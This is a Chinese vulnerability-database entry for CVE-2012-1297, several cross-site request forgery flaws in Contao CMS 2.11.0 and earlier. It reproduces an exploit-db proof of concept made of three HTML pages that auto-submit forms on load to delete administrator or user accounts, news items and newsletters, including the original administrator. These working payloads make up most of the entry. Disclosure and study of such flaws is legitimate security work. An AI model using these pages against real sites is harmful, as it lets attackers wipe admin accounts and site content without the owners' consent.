Contao ‘main.php’多个跨站请求伪造漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1120932 漏洞类型 跨站请求伪造
发布时间 2012-02-26 更新时间 2019-06-12
CVE编号 CVE-2012-1297 CNNVD-ID CNNVD-201203-339
漏洞平台 PHP CVSS评分 6.8
|漏洞来源
https://www.exploit-db.com/exploits/18527
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201203-339
|漏洞详情
Contao是一套采用PHP开发的开源内容管理系统(CMS)。该系统支持搜索引擎、权限管理和CSS框架等。 Contao (原为TYPOlight) 2.11.0及之前版本中的main.php中存在多个跨站请求伪造漏洞(CSRF)。远程攻击者可利用这些漏洞劫持(1)借助在user模块中的删除操作删除用户、(2)借助在news模块中的删除操作删除新闻,或(3)借助在newsletters模块中的删除操作删除通讯请求的管理员身份认证。
|漏洞EXP
+--------------------------------------------------------------------------------------------------------------------------------+
# Exploit Title : ContaoCMS (aka TYPOlight) <= 2.11 CSRF (Delete Admin- Delete Article)
# Date          : 25-02-2012
# Author        : Ivano Binetti (http://ivanobinetti.com)
# Software link : http://www.contao.org/en/download.html
# Vendor site   : http://www.contao.org
# Version       : 2.11.0 (latest) and lower 
# Tested on     : Debian Squeeze (6.0) 
+--------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------[Multiple Vulnerabilities by Ivano Binetti]-------------------------------------------+

Summary
1)Introduction
2)Vulnerabilities Description
  2.1 Delete Administrators or Users 
  2.2 Delete News
  2.3 Delete Newsletter
+--------------------------------------------------------------------------------------------------------------------------------+
1)Introduction
Contao (fka TYPOlight) is "an open source content management system (CMS) for people who want a professional internet presence that
is easy to maintain".

2)Vulnerabilities Description
Contao 2.11 (and lower)  is affected by CSRF Vulnerability which allows an attacker to delete admins/users, delete web pages 
(articles, news, newsletter and so on).
 
 2.1 Delete Administrators or Users
  <html>
  <body onload="javascript:document.forms[0].submit()">
  <H2>CSRF Exploit to delete ADMIN/USER account</H2>
  <form method="POST" name="form0" action="http://<contao_ip>:80/contao/main.php?do=user&act=delete&id=2">
  </body>
  </html>

  Note that the is possible to delete any admin/user, also the first administrator (id=1) created during Contao's installation phase.
  
  2.2 Delete News
  <html>
  <body onload="javascript:document.forms[0].submit()">
  <H2>CSRF Exploit to delete News</H2>
  <form method="POST" name="form0" action="http://<contao_ip>:80/contao/main.php?do=news&act=delete&id=1">
  </form>
  </body>
  </html>


  2.3 Delete Newsletter 
  <html>
  <body onload="javascript:document.forms[0].submit()">
  <H2>CSRF Exploit to delete Newsletter</H2>
  <form method="POST" name="form0" action="http://<contao_ip>:80/contao/contao/main.php?do=newsletter&act=delete&id=1">
  </form>
  </body>
  </html>
+--------------------------------------------------------------------------------------------------------------------------------+
|参考资料

来源:XF
名称:contao-newsletter-csrf(73479)
链接:http://xforce.iss.net/xforce/xfdb/73479
来源:EXPLOIT-DB
名称:18527
链接:http://www.exploit-db.com/exploits/18527
来源:SECUNIA
名称:48180
链接:http://secunia.com/advisories/48180
来源:packetstormsecurity.org
链接:http://packetstormsecurity.org/files/110214/ContaoCMS-2.11.0-Cross-Site-Request-Forgery.html
来源:ivanobinetti.blogspot.com
链接:http://ivanobinetti.blogspot.com/2012/02/contaocms-fka-typolight-211-csrf-delete.html